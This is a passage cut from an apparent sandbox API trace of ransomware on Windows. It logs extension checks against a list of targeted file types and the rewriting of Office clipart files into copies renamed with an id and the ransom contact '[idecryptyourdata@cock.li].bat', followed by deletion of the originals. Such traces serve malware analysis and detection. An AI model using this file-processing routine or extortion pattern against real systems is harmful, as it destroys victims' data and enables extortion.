(lpString=".xlsx") returned 5 [0070.078] lstrcmpiW (lpString1=".xlsx", lpString2="5.GIF") returned -1 [0070.078] lstrlenW (lpString=".ppt") returned 4 [0070.078] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0070.078] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099195.GIF") returned 68 [0070.078] lstrlenW (lpString=".zip") returned 4 [0070.078] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0070.078] lstrlenW (lpString=".rar") returned 4 [0070.078] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0070.078] lstrlenW (lpString=".bz2") returned 4 [0070.078] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0070.078] lstrlenW (lpString=".7z") returned 3 [0070.078] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0070.078] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099195.GIF") returned 68 [0070.078] lstrlenW (lpString=".dbf") returned 4 [0070.078] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0070.078] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099195.GIF") returned 68 [0070.078] lstrlenW (lpString=".1cd") returned 4 [0070.078] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0070.078] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099195.GIF") returned 68 [0070.078] lstrlenW (lpString=".jpg") returned 4 [0070.078] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0070.080] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0070.080] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0070.080] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099200.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099200.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x36c [0070.081] GetLastError () returned 0x0 [0070.081] ReadFile (in: hFile=0x370, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x409f, lpOverlapped=0x0) returned 1 [0070.122] WriteFile (in: hFile=0x36c, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x40a0, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x40a0, lpOverlapped=0x0) returned 1 [0070.123] ReadFile (in: hFile=0x370, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0070.123] WriteFile (in: hFile=0x36c, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0070.123] SetEndOfFile (hFile=0x36c) returned 1 [0070.123] CloseHandle (hObject=0x36c) returned 1 [0070.123] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0070.123] SetEndOfFile (hFile=0x370) returned 1 [0070.124] CloseHandle (hObject=0x370) returned 1 [0070.124] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099200.GIF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0070.124] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099200.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099200.gif")) returned 1 [0070.125] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099200.GIF") returned 68 [0070.125] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099200.GIF") returned 68 [0070.125] lstrlenW (lpString=".doc") returned 4 [0070.125] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0070.125] lstrlenW (lpString=".docx") returned 5 [0070.125] lstrcmpiW (lpString1=".docx", lpString2="0.GIF") returned -1 [0070.125] lstrlenW (lpString=".pdf") returned 4 [0070.125] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0070.125] lstrlenW (lpString=".xls") returned 4 [0070.125] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0070.125] lstrlenW (lpString=".xlsx") returned 5 [0070.125] lstrcmpiW (lpString1=".xlsx", lpString2="0.GIF") returned -1 [0070.125] lstrlenW (lpString=".ppt") returned 4 [0070.125] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0070.125] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099200.GIF") returned 68 [0070.125] lstrlenW (lpString=".zip") returned 4 [0070.125] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0070.125] lstrlenW (lpString=".rar") returned 4 [0070.125] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0070.125] lstrlenW (lpString=".bz2") returned 4 [0070.125] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0070.125] lstrlenW (lpString=".7z") returned 3 [0070.125] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0070.125] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099200.GIF") returned 68 [0070.125] lstrlenW (lpString=".dbf") returned 4 [0070.125] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0070.126] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099200.GIF") returned 68 [0070.126] lstrlenW (lpString=".1cd") returned 4 [0070.126] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0070.126] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099200.GIF") returned 68 [0070.126] lstrlenW (lpString=".jpg") returned 4 [0070.126] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0070.126] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0070.126] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0070.126] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099201.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099201.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x36c [0070.127] GetLastError () returned 0x0 [0070.127] ReadFile (in: hFile=0x370, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0xc8c9, lpOverlapped=0x0) returned 1 [0070.141] WriteFile (in: hFile=0x36c, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xc8d0, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xc8d0, lpOverlapped=0x0) returned 1 [0070.143] ReadFile (in: hFile=0x370, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0070.143] WriteFile (in: hFile=0x36c, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0070.143] SetEndOfFile (hFile=0x36c) returned 1 [0070.143] CloseHandle (hObject=0x36c) returned 1 [0070.143] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0070.143] SetEndOfFile (hFile=0x370) returned 1 [0070.144] CloseHandle (hObject=0x370) returned 1 [0070.144] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099201.GIF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0070.144] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099201.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099201.gif")) returned 1 [0070.145] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099201.GIF") returned 68 [0070.145] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099201.GIF") returned 68 [0070.145] lstrlenW (lpString=".doc") returned 4 [0070.145] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0070.145] lstrlenW (lpString=".docx") returned 5 [0070.145] lstrcmpiW (lpString1=".docx", lpString2="1.GIF") returned -1 [0070.145] lstrlenW (lpString=".pdf") returned 4 [0070.145] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0070.145] lstrlenW (lpString=".xls") returned 4 [0070.145] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0070.145] lstrlenW (lpString=".xlsx") returned 5 [0070.145] lstrcmpiW (lpString1=".xlsx", lpString2="1.GIF") returned -1 [0070.145] lstrlenW (lpString=".ppt") returned 4 [0070.145] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0070.145] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099201.GIF") returned 68 [0070.145] lstrlenW (lpString=".zip") returned 4 [0070.145] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0070.145] lstrlenW (lpString=".rar") returned 4 [0070.145] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0070.145] lstrlenW (lpString=".bz2") returned 4 [0070.145] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0070.145] lstrlenW (lpString=".7z") returned 3 [0070.145] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0070.145] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099201.GIF") returned 68 [0070.145] lstrlenW (lpString=".dbf") returned 4 [0070.145] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0070.145] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099201.GIF") returned 68 [0070.145] lstrlenW (lpString=".1cd") returned 4 [0070.145] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0070.145] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099201.GIF") returned 68 [0070.145] lstrlenW (lpString=".jpg") returned 4 [0070.145] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0070.146] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0070.146] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0070.146] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099204.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099204.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x36c [0070.146] GetLastError () returned 0x0 [0070.146] ReadFile (in: hFile=0x370, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x45be, lpOverlapped=0x0) returned 1 [0070.154] WriteFile (in: hFile=0x36c, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x45c0, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x45c0, lpOverlapped=0x0) returned 1 [0070.155] ReadFile (in: hFile=0x370, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0070.155] WriteFile (in: hFile=0x36c, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0070.155] SetEndOfFile (hFile=0x36c) returned 1 [0070.158] CloseHandle (hObject=0x36c) returned 1 [0070.158] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0070.158] SetEndOfFile (hFile=0x370) returned 1 [0070.161] CloseHandle (hObject=0x370) returned 1 [0070.161] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099204.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0070.161] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099204.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099204.wmf")) returned 1 [0070.162] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099204.WMF") returned 68 [0070.162] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099204.WMF") returned 68 [0070.162] lstrlenW (lpString=".doc") returned 4 [0070.162] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0070.162] lstrlenW (lpString=".docx") returned 5 [0070.162] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1 [0070.162] lstrlenW (lpString=".pdf") returned 4 [0070.162] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0070.162] lstrlenW (lpString=".xls") returned 4 [0070.162] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0070.162] lstrlenW (lpString=".xlsx") returned 5 [0070.162] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1 [0070.162] lstrlenW (lpString=".ppt") returned 4 [0070.162] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0070.162] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099204.WMF") returned 68 [0070.162] lstrlenW (lpString=".zip") returned 4 [0070.162] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0070.162] lstrlenW (lpString=".rar") returned 4 [0070.162] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0070.162] lstrlenW (lpString=".bz2") returned 4 [0070.162] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0070.162] lstrlenW (lpString=".7z") returned 3 [0070.162] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0070.162] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099204.WMF") returned 68 [0070.162] lstrlenW (lpString=".dbf") returned 4 [0070.162] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0070.162] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099204.WMF") returned 68 [0070.162] lstrlenW (lpString=".1cd") returned 4 [0070.162] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0070.162] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099204.WMF") returned 68 [0070.162] lstrlenW (lpString=".jpg") returned 4 [0070.162] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0070.164] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0070.164] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0070.164] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101857.BMP.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0101857.bmp.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0070.165] GetLastError () returned 0x0 [0070.165] ReadFile (in: hFile=0x370, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x7db8, lpOverlapped=0x0) returned 1 [0070.181] WriteFile (in: hFile=0x380, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x7dc0, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x7dc0, lpOverlapped=0x0) returned 1 [0070.182] ReadFile (in: hFile=0x370, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0070.182] WriteFile (in: hFile=0x380, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0070.182] SetEndOfFile (hFile=0x380) returned 1 [0070.185] CloseHandle (hObject=0x380) returned 1 [0070.186] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0070.186] SetEndOfFile (hFile=0x370) returned 1 [0070.186] CloseHandle (hObject=0x370) returned 1 [0070.186] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101857.BMP.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0070.187] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101857.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0101857.bmp")) returned 1 [0070.187] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101857.BMP") returned 68 [0070.187] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101857.BMP") returned 68 [0070.187] lstrlenW (lpString=".doc") returned 4 [0070.187] lstrcmpiW (lpString1=".doc", lpString2=".BMP") returned 1 [0070.187] lstrlenW (lpString=".docx") returned 5 [0070.187] lstrcmpiW (lpString1=".docx", lpString2="7.BMP") returned -1 [0070.187] lstrlenW (lpString=".pdf") returned 4 [0070.187] lstrcmpiW (lpString1=".pdf", lpString2=".BMP") returned 1 [0070.187] lstrlenW (lpString=".xls") returned 4 [0070.187] lstrcmpiW (lpString1=".xls", lpString2=".BMP") returned 1 [0070.187] lstrlenW (lpString=".xlsx") returned 5 [0070.187] lstrcmpiW (lpString1=".xlsx", lpString2="7.BMP") returned -1 [0070.187] lstrlenW (lpString=".ppt") returned 4 [0070.187] lstrcmpiW (lpString1=".ppt", lpString2=".BMP") returned 1 [0070.187] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101857.BMP") returned 68 [0070.187] lstrlenW (lpString=".zip") returned 4 [0070.187] lstrcmpiW (lpString1=".zip", lpString2=".BMP") returned 1 [0070.188] lstrlenW (lpString=".rar") returned 4 [0070.188] lstrcmpiW (lpString1=".rar", lpString2=".BMP") returned 1 [0070.188] lstrlenW (lpString=".bz2") returned 4 [0070.188] lstrcmpiW (lpString1=".bz2", lpString2=".BMP") returned 1 [0070.188] lstrlenW (lpString=".7z") returned 3 [0070.188] lstrcmpiW (lpString1=".7z", lpString2="BMP") returned -1 [0070.188] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101857.BMP") returned 68 [0070.188] lstrlenW (lpString=".dbf") returned 4 [0070.188] lstrcmpiW (lpString1=".dbf", lpString2=".BMP") returned 1 [0070.188] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101857.BMP") returned 68 [0070.188] lstrlenW (lpString=".1cd") returned 4 [0070.188] lstrcmpiW (lpString1=".1cd", lpString2=".BMP") returned -1 [0070.188] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101857.BMP") returned 68 [0070.188] lstrlenW (lpString=".jpg") returned 4 [0070.188] lstrcmpiW (lpString1=".jpg", lpString2=".BMP") returned 1 [0070.188] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0070.188] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0070.188] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101858.BMP.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0101858.bmp.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0070.189] GetLastError () returned 0x0 [0070.189] ReadFile (in: hFile=0x370, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x7db8, lpOverlapped=0x0) returned 1 [0070.208] WriteFile (in: hFile=0x380, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x7dc0, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x7dc0, lpOverlapped=0x0) returned 1 [0070.210] ReadFile (in: hFile=0x370, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0070.210] WriteFile (in: hFile=0x380, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0070.210] SetEndOfFile (hFile=0x380) returned 1 [0070.210] CloseHandle (hObject=0x380) returned 1 [0070.210] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0070.210] SetEndOfFile (hFile=0x370) returned 1 [0070.211] CloseHandle (hObject=0x370) returned 1 [0070.211] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101858.BMP.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0070.211] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101858.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0101858.bmp")) returned 1 [0070.591] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101858.BMP") returned 68 [0070.591] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101858.BMP") returned 68 [0070.591] lstrlenW (lpString=".doc") returned 4 [0070.591] lstrcmpiW (lpString1=".doc", lpString2=".BMP") returned 1 [0070.591] lstrlenW (lpString=".docx") returned 5 [0070.591] lstrcmpiW (lpString1=".docx", lpString2="8.BMP") returned -1 [0070.598] lstrlenW (lpString=".pdf") returned 4 [0070.598] lstrcmpiW (lpString1=".pdf", lpString2=".BMP") returned 1 [0070.598] lstrlenW (lpString=".xls") returned 4 [0070.598] lstrcmpiW (lpString1=".xls", lpString2=".BMP") returned 1 [0070.598] lstrlenW (lpString=".xlsx") returned 5 [0070.598] lstrcmpiW (lpString1=".xlsx", lpString2="8.BMP") returned -1 [0070.598] lstrlenW (lpString=".ppt") returned 4 [0070.598] lstrcmpiW (lpString1=".ppt", lpString2=".BMP") returned 1 [0070.598] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101858.BMP") returned 68 [0070.598] lstrlenW (lpString=".zip") returned 4 [0070.598] lstrcmpiW (lpString1=".zip", lpString2=".BMP") returned 1 [0070.598] lstrlenW (lpString=".rar") returned 4 [0070.598] lstrcmpiW (lpString1=".rar", lpString2=".BMP") returned 1 [0070.598] lstrlenW (lpString=".bz2") returned 4 [0070.598] lstrcmpiW (lpString1=".bz2", lpString2=".BMP") returned 1 [0070.598] lstrlenW (lpString=".7z") returned 3 [0070.598] lstrcmpiW (lpString1=".7z", lpString2="BMP") returned -1 [0070.598] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101858.BMP") returned 68 [0070.598] lstrlenW (lpString=".dbf") returned 4 [0070.598] lstrcmpiW (lpString1=".dbf", lpString2=".BMP") returned 1 [0070.598] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101858.BMP") returned 68 [0070.598] lstrlenW (lpString=".1cd") returned 4 [0070.598] lstrcmpiW (lpString1=".1cd", lpString2=".BMP") returned -1 [0070.598] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101858.BMP") returned 68 [0070.598] lstrlenW (lpString=".jpg") returned 4 [0070.598] lstrcmpiW (lpString1=".jpg", lpString2=".BMP") returned 1 [0070.599] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0070.599] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0070.599] CreateFileW (lpFileName="C:\\Program Files\\Microsoft 